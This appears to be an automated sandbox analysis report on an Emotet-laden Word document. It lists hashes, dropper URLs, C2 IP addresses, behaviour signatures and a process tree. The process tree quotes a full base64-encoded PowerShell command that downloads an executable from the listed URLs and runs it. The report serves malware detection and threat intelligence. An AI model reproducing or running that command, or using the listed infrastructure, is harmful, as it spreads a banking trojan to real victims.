Analysis

  • max time kernel
    132s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    14-10-2020 23:02

General

  • Target

    emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc

  • Size

    132KB

  • MD5

    40409631a9fb83e1ab8d02c2f8fa216d

  • SHA1

    e6b8170c2ca200cb38d26a9ad836bc596d38ba6d

  • SHA256

    a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc

  • SHA512

    b83ee57533375a8642b71463cbdf27f9ccfdea2d71ed90f21c4bbe4942276c2519446d0c15548d36d985dd9b999be0f946934a8261b5e1a85a8adafc6c89e3ea

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://newcarturkiye.com/wp-admin/Sbp/

exe.dropper

http://lilianwmina.com/wp-includes/Y/

exe.dropper

http://hbmonte.com/wp-content/wer/

exe.dropper

http://thewakestudio.com/wp-admin/3D/

exe.dropper

http://formedbyme.com/wp-content/3e/

exe.dropper

http://unitedway.giving.agency/sys-cache/XnT/

exe.dropper

http://partners.ripplealpha.com/data/ultimatemember/L/

Extracted

Family

emotet

Botnet

Epoch1

C2

188.157.101.114:80

192.175.111.214:8080

95.85.33.23:8080

192.232.229.54:7080

181.30.61.163:443

186.70.127.199:8090

200.127.14.97:80

70.169.17.134:80

24.232.228.233:80

172.104.169.32:8080

50.28.51.143:8080

177.73.0.98:443

149.202.72.142:7080

37.187.161.206:8080

202.29.239.162:443

213.197.182.158:8080

202.134.4.210:7080

190.24.243.186:80

201.213.177.139:80

105.209.235.113:8080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_a49020010a8e7d4bc405bcc23b9351dc19467c3d466e2d903c6df903668d51cc_2020-10-14__230041998141._doc.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1448
  • C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
    POwersheLL -ENCOD JABPAGMAYQB2AHAAOAAzAD0AWwBjAGgAYQByAF0ANAAyADsAJABVADYAOQBiAGoANAAwAD0AKAAoACcAQgBuACcAKwAnAHoAYgB2ACcAKQArACcAOABsACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAdQBTAEUAcgBwAHIATwBGAGkATABlAFwAQgAyADAARABZAGEAawBcAG8AdgBQAFEASABvADQAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBjAHQAbwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAUgBJAHQAYABZAHAAYABSAE8AVABgAG8AYwBPAEwAIgAgAD0AIAAoACgAJwB0AGwAcwAxADIAJwArACcALAAnACkAKwAnACAAJwArACcAdABsACcAKwAnAHMAMQAnACsAKAAnADEALAAgAHQAbAAnACsAJwBzACcAKQApADsAJABDAHUANgB5AGgAMQB6ACAAPQAgACgAJwBWACcAKwAoACcAOQBvAGYAJwArACcAeQAnACkAKwAnAHgAcAAnACkAOwAkAEgAcQBkAHcAbABqAGkAPQAoACcARwBiACcAKwAoACcANAAnACsAJwB1ADAAMQAnACkAKwAnAHMAJwApADsAJABIAHcAegBxADgAeAAxAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAMAAnACsAJwB9AEIAMgAwACcAKwAnAGQAeQAnACsAJwBhACcAKwAnAGsAewAwAH0ATwB2AHAAcQBoAG8ANAB7ADAAfQAnACkAIAAgAC0ARgAgACAAWwBjAEgAYQBSAF0AOQAyACkAKwAkAEMAdQA2AHkAaAAxAHoAKwAoACgAJwAuAGUAJwArACcAeAAnACkAKwAnAGUAJwApADsAJABVAHQAYgBrAGwAaQA2AD0AKAAnAEcAJwArACgAJwBhAHcAJwArACcAagBhAHkAJwApACsAJwBsACcAKQA7ACQAQQBjAGwAegBiADcANgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgBXAGUAYgBjAEwAaQBFAE4AVAA7ACQAUQB0ADkAYgB3AGUAcQA9ACgAKAAnAGgAJwArACcAdAB0ACcAKQArACgAJwBwADoAJwArACcALwAnACkAKwAoACcALwBuACcAKwAnAGUAJwApACsAKAAnAHcAJwArACcAYwBhACcAKQArACcAcgAnACsAKAAnAHQAdQByAGsAaQAnACsAJwB5ACcAKwAnAGUALgBjACcAKwAnAG8AbQAvAHcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBTAGIAcAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvAC8AJwArACcAbAAnACkAKwAoACcAaQAnACsAJwBsAGkAJwArACcAYQBuAHcAbQBpAG4AYQAuAGMAJwApACsAJwBvACcAKwAnAG0AJwArACgAJwAvAHcAJwArACcAcAAtACcAKQArACcAaQAnACsAKAAnAG4AYwAnACsAJwBsAHUAZABlACcAKQArACgAJwBzAC8AJwArACcAWQAvACcAKwAnACoAaAB0ACcAKwAnAHQAcAAnACkAKwAoACcAOgAvACcAKwAnAC8AaABiAG0AJwArACcAbwBuAHQAJwApACsAJwBlACcAKwAnAC4AYwAnACsAJwBvACcAKwAnAG0ALwAnACsAKAAnAHcAcAAnACsAJwAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbgAnACsAJwB0AGUAbgB0ACcAKQArACcALwAnACsAJwB3ACcAKwAnAGUAJwArACcAcgAnACsAKAAnAC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAJwApACsAKAAnAGgAZQAnACsAJwB3AGEAawAnACsAJwBlAHMAJwApACsAKAAnAHQAdQAnACsAJwBkAGkAJwApACsAJwBvAC4AJwArACgAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AdwAnACsAKAAnAHAAJwArACcALQBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4ALwAnACsAJwAzAEQAJwArACgAJwAvACoAaAB0ACcAKwAnAHQAJwApACsAJwBwADoAJwArACcALwAnACsAJwAvAGYAJwArACcAbwByACcAKwAoACcAbQAnACsAJwBlAGQAYgB5AG0AZQAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAHcAcAAnACsAJwAtAGMAbwBuAHQAJwApACsAKAAnAGUAJwArACcAbgB0ACcAKQArACcALwAzACcAKwAoACcAZQAvACoAaAAnACsAJwB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAvACcAKwAnAC8AdQAnACkAKwAoACcAbgBpAHQAJwArACcAZQAnACkAKwAnAGQAdwAnACsAKAAnAGEAeQAnACsAJwAuACcAKQArACgAJwBnAGkAdgBpACcAKwAnAG4AZwAuACcAKwAnAGEAZwAnACkAKwAoACcAZQBuACcAKwAnAGMAJwApACsAJwB5ACcAKwAnAC8AcwAnACsAJwB5ACcAKwAoACcAcwAtACcAKwAnAGMAYQBjACcAKQArACcAaABlACcAKwAnAC8AJwArACcAWAAnACsAJwBuACcAKwAoACcAVAAnACsAJwAvACcAKwAnACoAaAB0AHQAcAA6ACcAKQArACcALwAvACcAKwAnAHAAJwArACcAYQByACcAKwAoACcAdABuACcAKwAnAGUAcgBzAC4AcgAnACkAKwAoACcAaQBwACcAKwAnAHAAbABlACcAKQArACgAJwBhAGwAcABoACcAKwAnAGEALgBjAG8AJwApACsAKAAnAG0ALwBkACcAKwAnAGEAJwArACcAdABhAC8AJwApACsAKAAnAHUAJwArACcAbAB0AGkAbQAnACkAKwAoACcAYQB0AGUAbQBlAG0AYgAnACsAJwBlACcAKwAnAHIALwBMACcAKQArACcALwAnACkALgAiAHMAUABsAGAAaQBUACIAKAAkAE8AYwBhAHYAcAA4ADMAKQA7ACQATAA1ADMANQB6AG0AZQA9ACgAKAAnAEQAcwAnACsAJwAzAHUAZQAnACkAKwAnADMAJwArACcAcAAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFADEAMwBqAGUAdwBzACAAaQBuACAAJABRAHQAOQBiAHcAZQBxACkAewB0AHIAeQB7ACQAQQBjAGwAegBiADcANgAuACIAZABgAE8AVwBuAEwAbwBBAGQAYABGAGkAYABMAGUAIgAoACQARQAxADMAagBlAHcAcwAsACAAJABIAHcAegBxADgAeAAxACkAOwAkAEwAZQBtAGYAdgBmADQAPQAoACgAJwBQAHEAbQAnACsAJwBrACcAKQArACcAeAAnACsAJwAwAGcAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAEgAdwB6AHEAOAB4ADEAKQAuACIAbABlAGAATgBnAGAAVABIACIAIAAtAGcAZQAgADMAMgAwADcANAApACAAewAmACgAJwBJAG4AJwArACcAdgAnACsAJwBvAGsAZQAtAEkAdABlACcAKwAnAG0AJwApACgAJABIAHcAegBxADgAeAAxACkAOwAkAFAAZQBlADAAegB2AHEAPQAoACcARwAnACsAKAAnAGYANABxAGsAJwArACcAdABzACcAKQApADsAYgByAGUAYQBrADsAJABNADUANwBsAGcAdwBrAD0AKAAnAFMAJwArACgAJwBpAGoAJwArACcAYQA1ACcAKwAnAGYAZwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQA2AHMAeABrAGYAMgA9ACgAKAAnAFgAMwBsAGEAXwAnACsAJwB3ACcAKQArACcAbAAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1592
    • C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
      "C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:304
      • C:\Windows\SysWOW64\KBDGKL\icsunattend.exe
        "C:\Windows\SysWOW64\KBDGKL\icsunattend.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:684

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\B20DYak\ovPQHo4\V9ofyxp.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • C:\Users\Admin\B20dyak\Ovpqho4\V9ofyxp.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • C:\Windows\SysWOW64\KBDGKL\icsunattend.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • \Windows\SysWOW64\KBDGKL\icsunattend.exe
    MD5

    20882a2bd7e91707fcede0f3b603442c

    SHA1

    8e84e509a3a9c62198ef56684b132a2039829d54

    SHA256

    8c7d0b3a83c3605f4cb779efbe7ba74c32b8505e25db1ff832d14492894a1d9d

    SHA512

    3c89aaf0bb7a3d7829dd1e672a3b9c4d2a88daccd4f4c20e919e21c498f933669d186bcc01501662002ccbb84e99ec53e1206f375772aed8fb385d04632aa354

  • memory/304-17-0x0000000000560000-0x000000000057E000-memory.dmp
    Filesize

    120KB

  • memory/304-16-0x0000000000540000-0x000000000055F000-memory.dmp
    Filesize

    124KB

  • memory/304-13-0x0000000000000000-mapping.dmp
  • memory/596-23-0x000007FEF7C00000-0x000007FEF7E7A000-memory.dmp
    Filesize

    2.5MB

  • memory/684-19-0x0000000000000000-mapping.dmp
  • memory/684-21-0x00000000003A0000-0x00000000003BF000-memory.dmp
    Filesize

    124KB

  • memory/684-22-0x00000000003C0000-0x00000000003DE000-memory.dmp
    Filesize

    120KB

  • memory/1448-2-0x0000000008AF0000-0x0000000008AF4000-memory.dmp
    Filesize

    16KB

  • memory/1448-3-0x0000000006E60000-0x0000000007060000-memory.dmp
    Filesize

    2.0MB

  • memory/1592-12-0x000000001B970000-0x000000001B971000-memory.dmp
    Filesize

    4KB

  • memory/1592-11-0x000000001A8A0000-0x000000001A8A1000-memory.dmp
    Filesize

    4KB

  • memory/1592-10-0x0000000002480000-0x0000000002481000-memory.dmp
    Filesize

    4KB

  • memory/1592-9-0x00000000023C0000-0x00000000023C1000-memory.dmp
    Filesize

    4KB

  • memory/1592-8-0x000000001ACF0000-0x000000001ACF1000-memory.dmp
    Filesize

    4KB

  • memory/1592-7-0x0000000002380000-0x0000000002381000-memory.dmp
    Filesize

    4KB

  • memory/1592-6-0x000007FEF19B0000-0x000007FEF239C000-memory.dmp
    Filesize

    9.9MB